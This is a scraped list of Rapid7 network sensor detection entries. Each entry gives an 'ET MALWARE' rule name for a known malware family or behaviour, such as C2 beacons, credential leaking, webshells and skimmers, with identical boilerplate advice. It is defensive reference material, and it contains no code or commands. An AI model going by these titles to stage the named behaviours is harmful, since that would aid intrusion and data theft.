This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Astaroth User-Agent Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Babar POST Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Backdoor.Linux.Tsunami Outbound HTTP request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible BACKSWING JS Framework POST Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Banload Downloading Executable

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Bedep Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Bedep Connectivity Check (2)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Charming Kitten Backdoor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Charming Kitten Backdoor CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible CryptoPHP Leaking Credentials May 8 2015 M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible CryptoPHP Leaking Credentials May 8 2015 M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible CryptoPHP Leaking Credentials May 8 2015 M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible DACLS RAT CnC (Log Server Reporting)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible DANDERSPRITZ Default HTTP Headers

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible DANDERSPRITZ HTTP Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Possible Darkhotel Higasia Downloader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Darkhotel Higasia Downloader Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Darkhotel Higasia Downloader Requesting Module

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible DarkRats Tor Traffic

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible DarkTequila SSL/TLS Certificate Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible DEEP PANDA C2 Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Deep Panda - Sakula/Mivast RAT CnC Beacon 5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Possible Deep Panda User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dragonfly APT Activity HTTP URI OPTIONS

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dridex Download URI Struct with no referer

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Drive DDoS Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Duqu 2.0 Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dyre SSL Cert (fake state)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dyre SSL Cert Jan 22 2015

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dyre SSL Cert M1 (L O)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dyre SSL Cert M2 (L CN)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dyre SSL Cert M3 (O CN)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Emissary External IP Lookup

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Encoded Wide PowerShell (IEX) in Certificate Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Evil Macro Downloading Trojan Dec 16 2015 Post to EXE

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible FakeAV Binary Download (Security)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Fake AV Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible FoggyWeb Backdoor Server Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible FortDisco Reporting Hacked Accounts

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Gamaredon HEAD Request for .dot file on ddns.net

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Generic RAT over Telegram API

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Godzilla Loader Base64 Filename

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Graftor EXE Download Common Header Order

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible IceRat CnC Acitivty

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible iKittens OSX MacDownloader CNC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Possible IndigoDrop/Cobalt Strike Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible IoT_reaper ELF Binary Request M1 (set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible IoT_reaper ELF Binary Request M2 (set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible IoT_reaper ELF Binary Request M3 (set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible IoT_reaper ELF Binary Request M4 (set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible IoT_reaper ELF Binary Request M5 (set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Java/Downloader Observed in Pawn Storm CVE-2015-2590 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Java/Downloader Observed in Pawn Storm CVE-2015-2590 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible JKDDOS download cl.exe

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible JKDDOS download ddos.exe

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kaseya VSA Exploit Activity Inbound M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kaseya VSA Exploit Activity Inbound M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kaseya VSA Exploit URI Structure Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kelihos.F EXE Download Common Structure

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kelihos.F EXE Download Common Structure 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kelihos Infection Executable Download With Malformed Header

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kimsuky APT Connectivity Check via Document

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible KONNI CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Konni Encrypted Stage 2 Payload Inbound via HTTP

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible KONNI URI Path Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Linux/Cdorked.A CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Linux/Cdorked.A Incoming Command

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Locky VB/JS Loader Download Sep 08 2017

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Magecart Credit Card Information JS Script

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Maldoc Downloader Aug 18 2017

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Maldoc Downloading EXE Jul 26 2016

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible MalDoc Payload Download Nov 11 2014

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Maldoc Retrieving Dridex from pastebin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible MalDoc Retrieving Payload 2021-07-19

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible MalDoc Retrieving Payload 2021-11-01

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Invoice EXE

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Macro DL BIN May 2016 (No UA)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Macro DL EXE Feb 2016

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Macro DL EXE Feb 2016 (WinHTTPRequest)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Macro DL EXE May 2016 (Mozilla compatible)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Macro EXE DL AlphaNumL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Tor Module Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicous Macro DL EXE Jul 01 2016 (dll generic custom headers)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicous Macro DL EXE Jul 01 2016 (userdir dotted quad)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Mask C2 Traffic

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible MSIL/Solorigate.G!dha/SUPERNOVA Webshell Access Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible NGLite Backdoor C2 Traffic (NKN)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Possible OceanLotus C2 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Outbound WebShell GIF

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Outbound WebShell JPEG

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible PHP.MAILER WebShell Generic Request Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible PHP.MAILER WebShell Register Shutdown Function Request Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer CnC Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M6

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M7

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible PlugX Common Header Struct

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Ponmocup Driveby Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pony DLL Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pony Payload DL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible PowerShell Empire Activity Outbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Puzzlemaker Remote Shell Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Ransomware HTTP POST to Onion Link Domain

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Possible Rar’d Malware sent when remote host claims to send an Image

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
